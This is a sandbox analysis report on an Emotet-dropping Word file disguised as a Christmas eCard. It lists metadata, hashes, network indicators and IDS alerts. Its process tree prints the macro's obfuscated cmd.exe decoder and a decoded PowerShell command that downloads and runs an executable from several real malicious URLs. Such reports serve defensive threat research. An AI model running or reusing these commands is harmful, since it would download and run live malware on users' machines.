File name: | Christmas Greeting eCard.doc |
Full analysis: | https://app.any.run/tasks/c2a0384c-9130-45a0-951a-dbbe3da2fffe |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 19, 2018, 02:13:21 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 10:58:00 2018, Last Saved Time/Date: Mon Dec 17 10:58:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 43, Security: 0 |
MD5: | 09D389DC2E68CAA8B1087A212F6CEDE6 |
SHA1: | 5FAA3F69B6A7D159CB8C1007345B284C96A598C2 |
SHA256: | 85A080BEBE65F0F1B0AB42629CF8A49FADC9E1AC0B7559CB5A2E6BF74C70B2A5 |
SSDEEP: | 1536:i7ljmW9/bvFYaMpsDq3dBOgbBcWQrS+a9:Il/bvFNMhbBcWQ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 49 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 43 |
Words: | 7 |
Pages: | 1 |
ModifyDate: | 2018:12:17 10:58:00 |
CreateDate: | 2018:12:17 10:58:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2796 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Christmas Greeting eCard.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1540 | c:\MUijNfToFRIo\jbzsiqGSRj\nCMKAmdo\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set nMC=zjwlMbjnVGzanBJrPJNkcdOv:@uhS9yemDp';s =6UQ/}AIxW(\-0+.o17iHXt,fg{)$82Y3ZCF&&for %j in (67;41;32;10;39;35;48;12;55;35;36;67;5;6;3;39;12;31;2;51;55;5;6;31;20;61;38;18;31;61;54;48;31;5;73;3;58;31;12;61;36;67;72;2;58;39;35;27;61;61;34;24;43;43;37;61;15;58;19;31;71;34;15;55;21;26;20;61;58;55;12;37;54;20;55;32;43;63;59;60;21;59;37;31;55;52;25;27;61;61;34;24;43;43;6;55;32;6;55;32;37;61;26;21;58;55;54;20;55;32;43;33;61;47;8;3;28;26;25;27;61;61;34;24;43;43;26;3;26;37;27;11;5;31;15;54;20;55;32;43;52;70;70;42;19;47;26;70;56;25;27;61;61;34;24;43;43;21;15;11;34;11;15;61;54;55;15;64;43;32;30;73;32;47;28;9;29;25;27;61;61;34;24;43;43;5;58;3;3;63;15;58;61;10;6;15;54;20;55;32;43;10;72;45;60;29;11;57;29;52;17;35;54;28;34;3;58;61;49;35;25;35;66;36;67;42;23;28;39;35;37;61;3;35;36;67;60;23;9;38;39;38;35;40;68;69;35;36;67;4;74;17;39;35;72;4;72;35;36;67;6;70;21;39;67;31;12;23;24;61;31;32;34;53;35;50;35;53;67;60;23;9;53;35;54;31;47;31;35;36;63;55;15;31;11;20;27;49;67;48;63;48;38;58;12;38;67;72;2;58;66;65;61;15;30;65;67;5;6;3;54;33;55;2;12;3;55;11;21;74;58;3;31;49;67;48;63;48;62;38;67;6;70;21;66;36;67;60;20;46;39;35;41;3;21;35;36;46;63;38;49;49;9;31;61;51;46;61;31;32;38;67;6;70;21;66;54;3;31;12;64;61;27;38;51;64;31;38;68;52;52;52;52;66;38;65;46;12;23;55;19;31;51;46;61;31;32;38;67;6;70;21;36;67;2;32;34;39;35;10;6;32;35;36;5;15;31;11;19;36;44;44;20;11;61;20;27;65;44;44;67;2;5;5;39;35;70;55;34;35;36;83)do set mzDP=!mzDP!!nMC:~%j,1!&&if %j gtr 82 powershell.exe "!mzDP:~-451!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2624 | CmD /V:ON/C"set nMC=zjwlMbjnVGzanBJrPJNkcdOv:@uhS9yemDp';s =6UQ/}AIxW(\-0+.o17iHXt,fg{)$82Y3ZCF&&for %j in (67;41;32;10;39;35;48;12;55;35;36;67;5;6;3;39;12;31;2;51;55;5;6;31;20;61;38;18;31;61;54;48;31;5;73;3;58;31;12;61;36;67;72;2;58;39;35;27;61;61;34;24;43;43;37;61;15;58;19;31;71;34;15;55;21;26;20;61;58;55;12;37;54;20;55;32;43;63;59;60;21;59;37;31;55;52;25;27;61;61;34;24;43;43;6;55;32;6;55;32;37;61;26;21;58;55;54;20;55;32;43;33;61;47;8;3;28;26;25;27;61;61;34;24;43;43;26;3;26;37;27;11;5;31;15;54;20;55;32;43;52;70;70;42;19;47;26;70;56;25;27;61;61;34;24;43;43;21;15;11;34;11;15;61;54;55;15;64;43;32;30;73;32;47;28;9;29;25;27;61;61;34;24;43;43;5;58;3;3;63;15;58;61;10;6;15;54;20;55;32;43;10;72;45;60;29;11;57;29;52;17;35;54;28;34;3;58;61;49;35;25;35;66;36;67;42;23;28;39;35;37;61;3;35;36;67;60;23;9;38;39;38;35;40;68;69;35;36;67;4;74;17;39;35;72;4;72;35;36;67;6;70;21;39;67;31;12;23;24;61;31;32;34;53;35;50;35;53;67;60;23;9;53;35;54;31;47;31;35;36;63;55;15;31;11;20;27;49;67;48;63;48;38;58;12;38;67;72;2;58;66;65;61;15;30;65;67;5;6;3;54;33;55;2;12;3;55;11;21;74;58;3;31;49;67;48;63;48;62;38;67;6;70;21;66;36;67;60;20;46;39;35;41;3;21;35;36;46;63;38;49;49;9;31;61;51;46;61;31;32;38;67;6;70;21;66;54;3;31;12;64;61;27;38;51;64;31;38;68;52;52;52;52;66;38;65;46;12;23;55;19;31;51;46;61;31;32;38;67;6;70;21;36;67;2;32;34;39;35;10;6;32;35;36;5;15;31;11;19;36;44;44;20;11;61;20;27;65;44;44;67;2;5;5;39;35;70;55;34;35;36;83)do set mzDP=!mzDP!!nMC:~%j,1!&&if %j gtr 82 powershell.exe "!mzDP:~-451!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2424 | powershell.exe "$Umz='Wno';$bjl=new-object Net.WebClient;$Zwi='http://strike3productions.com/fHXdHseo0@http://jomjomstudio.com/DtxVlSu@http://ulushaber.com/0YYQkxuY1@http://drapart.org/myCmxSG9@http://billfritzjr.com/zZAX9a790J'.Split('@');$QvS='stl';$XvG = '682';$MFJ='ZMZ';$jYd=$env:temp+'\'+$XvG+'.exe';foreach($WfW in $Zwi){try{$bjl.DownloadFile($WfW, $jYd);$XcI='Uld';If ((Get-Item $jYd).length -ge 80000) {Invoke-Item $jYd;$wmp='zjm';break;}}catch{}}$wbb='Yop';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4028 | "C:\Users\admin\AppData\Local\Temp\682.exe" | C:\Users\admin\AppData\Local\Temp\682.exe | — | powershell.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
1348 | "C:\Users\admin\AppData\Local\Temp\682.exe" | C:\Users\admin\AppData\Local\Temp\682.exe | 682.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
2248 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 682.exe |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa Exit code: 0 | ||||
2844 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporat Integrity Level: MEDIUM Description: Stoh Levadihote (non-ShiftLock) Keyboa |
PID | Process | Filename | Type | |
---|---|---|---|---|
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR961C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9DE961D5.wmf | — | |
MD5:— | SHA256:— | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A7EB87AB.wmf | — | |
MD5:— | SHA256:— | |||
2424 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CG7T2REXQ4M6MUPMVUA7.temp | — | |
MD5:— | SHA256:— | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8FA1D5D2.wmf | wmf | |
MD5:4C2BEC3BE57A6FB8454AE1E2CA17520D | SHA256:28F67E967AD690417DCF1C2FE62149032601AA9CCBA74BDB92F8C388CE2BCAE6 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F8B313C273380B644EB92883C0F36F50 | SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001 | |||
2424 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AFB92824.wmf | wmf | |
MD5:4A82F8435D1CE7D9E2EF36C836CA4915 | SHA256:28C253BF46501970377BD18080F725FAA4660281588601902C67F345BB67BFA4 | |||
2796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:F5BC81BC9AB91D3ABC558015C50B1E9D | SHA256:FE50050C27602EAFC139088E89385DA7A4ADEEC12FCB89BE853B5093B418375D | |||
1348 | 682.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:D52A4B0C6AC8C854FCCA40A02CA1D95F | SHA256:888BF4EA67391FBCAD6A92BF51F148CB8F0D83798C8E16C2A9A33B180FC0BE38 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2424 | powershell.exe | GET | — | 103.27.201.8:80 | http://jomjomstudio.com/DtxVlSu/ | TH | — | — | malicious |
2424 | powershell.exe | GET | 200 | 134.0.10.197:80 | http://drapart.org/myCmxSG9/ | ES | executable | 124 Kb | malicious |
2844 | archivesymbol.exe | GET | — | 187.140.90.91:8080 | http://187.140.90.91:8080/ | MX | — | — | malicious |
2844 | archivesymbol.exe | GET | — | 201.190.150.60:443 | http://201.190.150.60:443/ | AR | — | — | malicious |
2424 | powershell.exe | GET | 301 | 103.27.201.8:80 | http://jomjomstudio.com/DtxVlSu | TH | html | 240 b | malicious |
2424 | powershell.exe | GET | 301 | 134.0.10.197:80 | http://drapart.org/myCmxSG9 | ES | html | 236 b | malicious |
2844 | archivesymbol.exe | GET | — | 78.189.21.131:80 | http://78.189.21.131/ | TR | — | — | malicious |
2424 | powershell.exe | GET | 404 | 103.4.235.152:80 | http://strike3productions.com/fHXdHseo0 | AU | html | 326 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2424 | powershell.exe | 103.4.235.152:80 | strike3productions.com | TPG Telecom Limited | AU | malicious |
2424 | powershell.exe | 103.27.201.8:80 | jomjomstudio.com | Bangmod Enterprise Co., Ltd. | TH | malicious |
2424 | powershell.exe | 134.0.10.197:80 | drapart.org | 10dencehispahard, S.L. | ES | malicious |
2844 | archivesymbol.exe | 213.120.119.231:8443 | — | British Telecommunications PLC | GB | malicious |
2844 | archivesymbol.exe | 78.189.21.131:80 | — | Turk Telekom | TR | malicious |
2844 | archivesymbol.exe | 187.140.90.91:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2844 | archivesymbol.exe | 81.150.17.158:50000 | — | British Telecommunications PLC | GB | malicious |
2844 | archivesymbol.exe | 81.150.17.158:8443 | — | British Telecommunications PLC | GB | malicious |
2844 | archivesymbol.exe | 201.190.150.60:443 | — | ARLINK S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
strike3productions.com |
| malicious |
jomjomstudio.com |
| malicious |
ulushaber.com |
| malicious |
drapart.org |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2424 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
2424 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2424 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2424 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2844 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |